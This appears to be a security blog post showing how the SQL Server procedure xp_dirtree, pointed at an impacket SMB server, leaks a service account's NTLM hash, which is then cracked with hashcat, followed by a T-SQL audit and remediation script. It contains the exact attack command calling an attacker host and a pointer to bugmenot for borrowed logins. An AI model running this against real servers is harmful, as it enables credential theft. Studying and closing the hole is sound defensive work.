
How to capture MSSQL credentials with xp_dirtree, smbserver.py and fix common MSSQL issues by @_markmo_

In security, we must show people how things can be misused before they take a threat seriously. Please note, this attack is not new, but it is new to me and I wanted to share what I learned as well as how to fix it.

First, start smbserver.py from impacket on the host that will receive the connection (found here: https://github.com/CoreSecurity/impacket/blob/master/examples/smbserver.py).


I set up a sample service account on a local machine to run my SQL process. DBAs often use service accounts because they want the SQL Server process to be able to access a shared network drive. This is where things get REALLY INTERESTING!!!


Now I'll connect with my local "Security" account. It really doesn't matter which account I use: if EXECUTE on xp_dirtree is granted to PUBLIC (the default), anyone with a login can run it. Here is the cool part. The procedure reaches out to the share under the security context of the service account running the SQL Server process, so that is the account whose NTLM authentication hash we capture! My user account may not have awesome rights on the database, but the service account (SVC_MySvcAcct) I'm running does! Here is the command if you can't read it from the image: EXEC master.sys.xp_dirtree '\\10.10.10.154\myshare',1,1


Once the command is executed we’ve captured our hash on our Kali box and it is the service account!


Now we write the hash to a file


and crack it with hashcat


Here is the password of the service account running my SQL server


How do we identify the problem and fix it? There is a fantastic free SQL audit script from SQL Server Central by Rudy Panigas here: http://www.sqlservercentral.com/articles/Audit/136459/. If you don't want to sign up on SQL Server Central to download the script, you "could" try this URL to get a password: http://bugmenot.com/view/sqlservercentral.com

Once you run it you will get some great output for your DBA. I ran this on a brand-new installation, so these values are defaults. At the top it shows what it checks for.


At the bottom, it shows the issues that need review.


In the middle it tells the DBA how and why to fix the issues it identifies.
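For DBAs who want to check and close this specific hole directly, here is a T-SQL audit-and-remediate script I added for this post; it is not the Rudy Panigas audit script and not part of the original walkthrough. The login name 'DOMAIN\Security' is a placeholder for whichever non-sysadmin login you want to test as; everything else is standard SQL Server catalog views.

```sql
USE master;
GO

-- 1. Who can execute xp_dirtree?  On a default install this returns a
--    GRANT EXECUTE row for 'public', i.e. every login on the instance.
SELECT pr.name           AS grantee,
       pr.type_desc      AS grantee_type,
       pe.permission_name,
       pe.state_desc
FROM sys.database_permissions AS pe
JOIN sys.database_principals  AS pr
      ON pr.principal_id = pe.grantee_principal_id
WHERE pe.class    = 1                               -- object-level permission
  AND pe.major_id = OBJECT_ID('sys.xp_dirtree');
GO

-- 2. Confirm the exposure exactly as a low-privileged login would see it.
--    'DOMAIN\Security' is a placeholder for the non-sysadmin login under test.
EXECUTE AS LOGIN = 'DOMAIN\Security';
SELECT permission_name
FROM sys.fn_my_permissions('sys.xp_dirtree', 'OBJECT');  -- EXECUTE listed = exposed
REVERT;
GO

-- 3. Which Windows account will authenticate to a remote share when
--    xp_dirtree is pointed at a UNC path?  A domain service account here is
--    what makes the captured hash worth cracking.
SELECT servicename, service_account
FROM sys.dm_server_services;
GO

-- 4. Remediate: remove the default grant so only sysadmin members (and any
--    grantee you deliberately add back) can call xp_dirtree.
REVOKE EXECUTE ON OBJECT::sys.xp_dirtree FROM public;
GO

-- 5. Re-run step 1; the 'public' row should be gone.  Step 2 for the same
--    login should now return no EXECUTE row.
```

Pair the revoke with an egress firewall rule that blocks SMB (TCP 445) from the SQL host to untrusted networks, since a sysadmin login can still invoke the procedure.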


When time permits I'll do a write-up on other insecure settings in SQL Server. I hope this finds you with a smile. Follow me on Twitter @_markmo_

Written by @_markmo_ on Twitter
